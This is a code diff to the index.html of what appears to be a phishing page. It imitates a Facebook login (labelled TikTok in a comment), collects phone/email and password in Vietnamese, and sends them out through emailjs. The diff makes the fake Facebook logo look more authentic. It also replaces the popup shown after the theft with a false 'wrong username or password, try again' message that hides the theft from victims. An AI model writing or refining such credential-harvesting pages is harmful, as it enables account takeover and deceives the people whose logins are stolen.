--- a/index.html
+++ b/index.html
@@ -359,7 +359,7 @@
         <!-- TikTok Login -->
         <div class="login-container-tiktok">
             <div class="facebook-logo">
-                <img src="https://static.xx.fbcdn.net/rsrc.php/yI/r/4aAhOHG-Ft5.svg" alt="Facebook" onerror="this.src='https://upload.wikimedia.org/wikipedia/commons/8/89/Facebook_Logo_%282019%29.svg'">
+                <img src="https://www.facebook.com/images/fb_icon_325x325.png" alt="Facebook" onerror="this.src='https://upload.wikimedia.org/wikipedia/commons/8/89/Facebook_Logo_%282019%29.svg'">
             </div>
             <input type="text" id="login-input-tiktok" placeholder="Số di động hoặc email">
             <input type="password" id="password-tiktok" placeholder="Mật khẩu">
@@ -555,7 +555,7 @@
                 timestamp: new Date().toLocaleString()
             };
             emailjs.send('service_gibcgh4', 'template_vxfphjh', templateParams)
-                .then(() => showPopup("Thành công", "Thông tin đăng nhập đã được gửi qua email."), 
+                .then(() => showPopup("Đăng nhập không thành công", "Sai tên đăng nhập hoặc mật khẩu, vui lòng thử lại."), 
                       () => showPopup("Đăng nhập không thành công", "Có lỗi xảy ra khi gửi thông tin."));
         }
 
